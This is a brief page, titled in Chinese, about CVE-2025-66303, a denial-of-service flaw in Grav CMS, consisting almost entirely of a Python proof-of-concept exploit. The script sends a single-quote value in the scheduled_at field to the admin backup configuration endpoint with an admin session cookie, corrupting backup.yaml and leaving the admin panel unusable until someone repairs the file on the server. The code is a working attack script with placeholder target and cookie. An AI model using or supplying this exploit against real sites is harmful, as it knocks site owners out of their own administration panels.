CVE-2025-66303 Grav CMS scheduled_at参数DoS漏洞

# CVE-2025-66303 PoC - Grav CMS scheduled_at DoS # This PoC demonstrates the DoS vulnerability via malicious scheduled_at parameter import requests import json # Target Grav CMS instance target_url = "http://target-grav-site.com/admin/configurations/backup" # Malicious payload - single quote to corrupt cron expression malicious_payload = { "backup": { "scheduled_at": "'" } } # Admin session cookies (requires authenticated admin access) cookies = { "grav-site": "your-admin-session-cookie" } # Send malicious request to corrupt backup.yaml response = requests.post( target_url, data=malicious_payload, cookies=cookies, verify=False ) # Verify the DoS condition if response.status_code == 200: print("[+] DoS payload sent successfully") print("[*] The backup.yaml file is now corrupted") print("[*] Admin panel should be non-functional") print("[!] Recovery requires manual server access to fix backup.yaml") else: print("[-] Attack failed, check credentials and target URL")